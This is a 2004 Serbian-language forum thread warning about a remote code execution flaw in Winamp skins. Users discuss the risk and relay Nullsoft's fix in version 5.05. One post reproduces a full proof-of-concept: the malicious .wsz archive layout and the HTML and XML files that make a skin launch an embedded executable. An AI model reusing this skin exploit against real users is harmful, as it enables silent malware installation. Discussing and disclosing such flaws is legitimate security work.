MyCity » Zaštita od zlonamernih programa » Winamp skinovi - potencijalna opasnost

Winamp skinovi - potencijalna opasnost

Napisano na dan: 27.8.2004

Winamp skinovi - potencijalna opasnost
Sledeća strana Pagination

Idi na vrh

Poslao: 27 Avg 2004 00:34
Idi na vrh
offline
  • Pridružio: 04 Sep 2003
  • Poruke: 24135
  • Gde živiš: Wien

Kako izvestava news.com a prenosi softpedia, Winamp-ov nacin ucitavanja skinova omogucava izvrsenje podmetnutog izvrsnog fajla. Vise Procitajte na: [Link mogu videti samo ulogovani korisnici]



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 27 Avg 2004 06:56
Idi na vrh
offline
  • gamzzy 
  • Legendarni građanin
  • Pridružio: 24 Apr 2003
  • Poruke: 10725
  • Gde živiš: Novi Sad

Pitao sam se da li će iko reagovati na to... "pokretanjem skin-a" se on samo iskopira tamo gde treba sa sve njegovim sadržajem, a iako je to u stvari zip arhiva raspakuje se korišćenjem istog.



Poslao: 27 Avg 2004 23:05
Idi na vrh
offline
  • SVITAC 
  • Legendarni građanin
  • Pridružio: 28 Apr 2003
  • Poruke: 5919
  • Gde živiš: Beograd

Da je samo kopiranje .. možda to ne bi bio veći broblem .. ali se radi i o pokretanju istog ..

Poslao: 28 Avg 2004 12:09
Idi na vrh
offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Winamp <=5.04 Skin File (.wsz) Remote Code Execution Exploit



This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !


skinhead.wsz (skinhead.zip)
-----------------------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml


/html/test.htm
----------------
<html>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>
</html>


/xml/includes.xml
-------------------
<include file="player.xml"/>


/xml/player-normal.xml
-------------------------
<layout>
<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />
</layout>


/xml/player.xml
-----------------
<container id="main" name="main">
<include file="player-normal.xml"/>
</container>


/skin.xml
---------
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<skininfo>
<version>1.0</version>
<name>Batman</name>
<comment></comment>
<author>Petrol Designs</author>
<email>info@petroldesigns.com</email>
<homepage>http://www.petroldesigns.com</homepage>
</skininfo>

<include file="xml/includes.xml"/>
<!--
-->
</WinampAbstractionLayer>

Poslao: 28 Avg 2004 13:35
Idi na vrh
offline
  • Puky  Male
  • Scottish rebel
  • Pridružio: 18 Apr 2003
  • Poruke: 5815
  • Gde živiš: u Zmajevom gnjezdu

AxeZ ::
There is no patch for this vulnerability -> Do not use Winamp !


Ma super ... kako da ga ne koristim.
Resenje : ne instalirati skinove.

Poslao: 28 Avg 2004 21:29
Idi na vrh
offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

From:
K-OTiK Security <Special-Alerts@k-otik.com>


To:
[Link mogu videti samo ulogovani korisnici]


Date:
Today 03:56:12 pm

In-Reply-To: <20040826164943.17362.qmail@www.securityfocus.com>

Nullsoft has issued a fix for this critical vulnerability affecting Winamp 3.0, 5.0 and 5.0 Pro or newer.

Nullsoft said that Winamp 5.05 resolves this exploit in two ways:

- Winamp will now prompt all users with a confirmation window before installing any skins.
- Winamp will now only extract files considered low risk before loading a Winamp Skin.

ALL Winamp users MUST upgrade to Winamp 5.05 immediately.

[Link mogu videti samo ulogovani korisnici]

Regards.
K-OTik.COM Security Survey Team
[Link mogu videti samo ulogovani korisnici]

Poslao: 16 Sep 2004 14:42
Idi na vrh
offline
  • Goran 
  • Prof.Mr.Dr.Sci. Traumatologije
  • Pridružio: 05 Maj 2003
  • Poruke: 9977
  • Gde živiš: Singidunum

Postoji puno alternativa, nego ljudi navikli na "Winamp" pa to ti je.

Poslao: 26 Dec 2004 22:57
Idi na vrh
offline
  • Piksi  Male
  • Elitni građanin
  • Pridružio: 13 Nov 2003
  • Poruke: 2435

Mislim da najmanje 60 % korisnika Windows-a koristi Winamp...tako da ce biti tesko odvici se!!! U ostalom mozemo da koristimo Klasicni skin ili MODERN skin...tako da odvikavanje nije potrebno!

MyCity » Zaštita od zlonamernih programa » Winamp skinovi - potencijalna opasnost

Ko je trenutno na forumu
 

Ukupno su 2090 korisnika na forumu :: 123 registrovanih, 11 sakrivenih i 1956 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 5253 - dana 09 Dec 2025 16:26

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: 015, A.R.Chafee.Jr., Agape, ALFASPORTIVO, amaterSRB, Apok, babaroga, bbogdan, bigbear, Bobrock1, boj.an, Bojan198527, Boroš, BORUTUS, BWG, cemix, Chainsaw, Cicumile, Clouseau, cojapop, crnirocko, crnogorac, Cvetkovic, cvrle312, dano, deLacy, delrey, DENIRO, Despot Đurađ, Dexlex, Dioniss, djonsule, DrNeoCortex, Drugard72, Dungorth, FileFinder, geo.dule, GeoM, goxin, HogarStrashni, HrcAk47, Istman, ivan_8282, Jakonjveliki, Jester, knutveliki, Kozara1, Kozi-RS, laganini123, Lelemood, Lester Freamon, loon123, maiden6657, mane123, Marija88, mačković, mercedesamg, metallac777, mexo, milimoj, MILJEVINAC, nebojsag, Nemanja.M, nerislav2025, nevjerna beba, niksa517, ognjenv, omen, opt1, Orc, paja69, Panter, Papadubi, pavle_pzs, Pero, picknick, ping15, PITT, Poof, prashinar, predragc, raptorsi, Recce, Resnica, sabros, sekretar, Slobodan Filipović, SOVO515, Srle993, Srpska zauvjek, Stanlio, Stefan M, strelac07, strn, tachinni, Tajpan, tihi-posmatrac, tomigun, tooooom, Tunguska55, Uridium, vaci, Vaske8990, vazduh, Velibor Radoja, VJ, VladaKG1980, Vlajman1957, vojnik švejk, VOŽD, vukan0799, VX1, xAlex2, YU-UKI, Zastava, Zdilar, ZlatniRez, zmajognjeniivan, zokizemun, Zvrk, zzapNDjuric99, |_MeD_|, Šraf